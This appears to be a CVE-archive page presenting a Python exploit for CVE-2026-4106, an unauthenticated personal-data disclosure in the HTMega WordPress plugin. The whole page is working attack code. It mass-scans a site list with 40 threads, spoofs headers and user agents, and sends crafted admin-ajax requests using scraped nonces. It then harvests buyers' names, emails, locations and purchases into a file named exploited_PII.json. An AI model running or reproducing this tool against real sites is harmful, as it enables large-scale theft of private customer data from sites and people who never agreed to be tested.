5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import requests
import re
import json
import random
import time
import urllib3
import os
import ssl
import sys
import ctypes
import signal
import threading
import html
from urllib.parse import urljoin
from concurrent.futures import ThreadPoolExecutor, as_completed

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

os.system('') 

RED = '\033[91m'
GREEN = '\033[92m'
CYAN = '\033[96m'
RESET = '\033[0m'

IS_RUNNING = True
counter_lock = threading.Lock()
file_lock = threading.Lock()

def signal_handler(sig, frame):
    global IS_RUNNING
    IS_RUNNING = False
    print(f"\n{RED}[!] Keyboard interrupt received. Exiting immediately...{RESET}")
    os._exit(1)

signal.signal(signal.SIGINT, signal_handler)

class SSLAdapter(requests.adapters.HTTPAdapter):
    def init_poolmanager(self, *args, **kwargs):
        context = ssl.create_default_context()
        context.set_ciphers('DEFAULT@SECLEVEL=1')
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        kwargs['ssl_context'] = context
        return super(SSLAdapter, self).init_poolmanager(*args, **kwargs)

class HTMegaPoC:
    def __init__(self, thread_count=40):
        self.json_file = "exploited_PII.json"
        self.summary_file = "exploited_summary.txt"
        self.thread_count = thread_count
        self.processed_count = 0
        self.total_sites = 0
        self.session = requests.Session()
        adapter = SSLAdapter()
        self.session.mount("https://", adapter)
        self.session.mount("http://", adapter)
        self.agents = [
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
            "Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1"
        ]

    def set_title(self, title):
        if sys.platform == "win32":
            ctypes.windll.kernel32.SetConsoleTitleW(title)

    def get_headers(self, target):
        fake_ip = ".".join(map(str, (random.randint(1, 254) for _ in range(4))))
        return {
            'User-Agent': random.choice(self.agents),
            'X-Requested-With': 'XMLHttpRequest',
            'Referer': target + '/',
            'X-Forwarded-For': fake_ip,
            'Accept': 'application/json, text/javascript, */*; q=0.01'
        }

    def scan_target(self, target):
        global IS_RUNNING
        if not IS_RUNNING: return
        target = target.strip()
        if not target: return
        if not target.startswith('http'): target = 'https://' + target
        
        try:
            r_main = self.session.get(target, headers=self.get_headers(target), timeout=10, verify=False)
            with counter_lock:
                self.processed_count += 1
                current_idx = self.processed_count
            
            self.set_title(f"CVE-2026-4106 | Scanning: {current_idx}/{self.total_sites}")
            
            print(f"[*] [{current_idx}/{self.total_sites}] Checking: {target}")
            
            if '/wp-content/' not in r_main.text.lower() or 'htmega' not in r_main.text.lower():
                return
            
            nonces = list(set(re.findall(r'security\s*[:=]\s*[\'"]([a-f0-9]{10})[\'"]', r_main.text)))
            ajax_url = urljoin(target, '/wp-admin/admin-ajax.php')
            
            actions = [
                "wcsales_purchased_products",
                "htmega_wc_sales_notification_data_load",
                "htmega_user_list_ajax",
                "htmega_contact_form_data_load",
                "htmega_team_member_ajax",
                "htmega_get_recent_orders_ajax",
                "htmega_post_grid_ajax",
                "htmega_portfolio_ajax",
                "htmega_search_results",
                "htmega_instagram_feed",
                "htmega_twitter_feed"
            ]
            
            for action in actions:
                if not IS_RUNNING: break
                payloads = [{'action': action, 'limit': '1000'}]
                for n in nonces:
                    payloads.append({'action': action, 'security': n, 'limit': '1000'})
                    payloads.append({'action': action, 'nonce': n, 'limit': '1000'})
                
                for data in payloads:
                    if not IS_RUNNING: break
                    r = self.session.post(ajax_url, data=data, headers=self.get_headers(target), timeout=12, verify=False)
                    res_body = r.text.strip()
                    
                    if res_body.lower().startswith('<html') or '<!doctype' in res_body.lower():
                        continue
                        
                    if r.status_code == 200 and res_body not in ["0", "-1", ""]:
                        try:
                            json_data = r.json()
                            if any(k in str(json_data).lower() for k in ['fname', 'lname', 'email', 'buyer', 'city', 'phone', 'price', 'user_login', 'message']):
                                self.save_data(target, action, data.get('security', 'None'), json_data)
                                print(f"[{GREEN}+{RESET}] {RED}VULNERABLE:{RESET} {target} | Action: {CYAN}{action}{RESET}")
                                return
                        except:
                            if any(k in res_body.lower() for k in ['fname', 'email', 'billing', 'city', 'user_login']):
                                self.save_data(target, action, data.get('security', 'None'), res_body)
                                print(f"[{GREEN}+{RESET}] {RED}VULNERABLE:{RESET} {target} | Action: {CYAN}{action}{RESET}")
                                return
        except:
            pass

    def save_data(self, url, action, nonce, data):
        with file_lock:
            ts = time.strftime("%Y-%m-%d %H:%M:%S")
            json_entry = {"url": url, "action": action, "nonce": nonce, "date": ts, "data": data}
            
            try:
                db = []
                if os.path.exists(self.json_file):
                    with open(self.json_file, "r", encoding="utf-8") as f: db = json.load(f)
                db.append(json_entry)
                with open(self.json_file, "w", encoding="utf-8") as f: json.dump(db, f, indent=4, ensure_ascii=False)
            except: pass
            
            try:
                with open(self.summary_file, "a", encoding="utf-8") as f:
                    f.write(f"[+] Target: {url} | Action: {action} | Date: {ts}\n")
                    if isinstance(data, list) and len(data) > 0:
                        for item in data[:30]:
                            b = item.get('buyer', {})
                            name = f"{b.get('fname','')} {b.get('lname','')}".strip() or item.get('display_name', 'UNKNOWN')
                            loc = f"{b.get('city','Unknown')}/{b.get('country','Unknown')}"
                            prod_name = item.get('name', item.get('post_title', 'N/A'))
                            price_raw = str(item.get('price', 'N/A'))
                            price = html.unescape(price_raw)
                            prod_url = item.get('url', 'N/A')
                            
                            f.write(f"    -> Buyer: {name} | Location: {loc} | Item: {prod_name} | Price: {price} | URL: {prod_url}\n")
                    else:
                        f.write(f"    -> [RAW DATA] {str(data)[:200]}...\n")
                    f.write("\n")
            except: pass

    def run(self, sites):
        self.total_sites = len(sites)
        print(f"[*] Starting scan on {self.total_sites} targets using {self.thread_count} threads...")
        
        with ThreadPoolExecutor(max_workers=self.thread_count) as executor:
            try:
                futures = [executor.submit(self.scan_target, site) for site in sites]
                for future in as_completed(futures):
                    if not IS_RUNNING:
                        break
            except KeyboardInterrupt:
                os._exit(1)

if __name__ == "__main__":
    print(f"""{CYAN}
===============================================================
[+] Exploit   : CVE-2026-4106
[+] Title     : HTMega Unauthenticated PII Disclosure Exploit
[+] Author    : EFETR
==============================================================={RESET}
    """)
    print("[1] Single Target\n[2] Mass Scan (sites.txt)")
    choice = input(f"[{GREEN}?{RESET}] Select mode: ")
    
    if choice == "1":
        target_url = input(f"[{GREEN}?{RESET}] URL: ")
        scanner = HTMegaPoC(thread_count=1)
        scanner.run([target_url])
        
    elif choice == "2":
        threads_input = input(f"[{GREEN}?{RESET}] Threads (default 40): ")
        threads = int(threads_input) if threads_input.strip() else 40
        scanner = HTMegaPoC(thread_count=threads)
        
        if os.path.exists("sites.txt"):
            with open("sites.txt", "r") as f:
                site_list = [line.strip() for line in f.readlines() if line.strip()]
            scanner.run(site_list)
        else:
            print(f"{RED}[-] Error: sites.txt not found in current directory.{RESET}")
            
    else:
        print(f"{RED}[-] Invalid choice.{RESET}")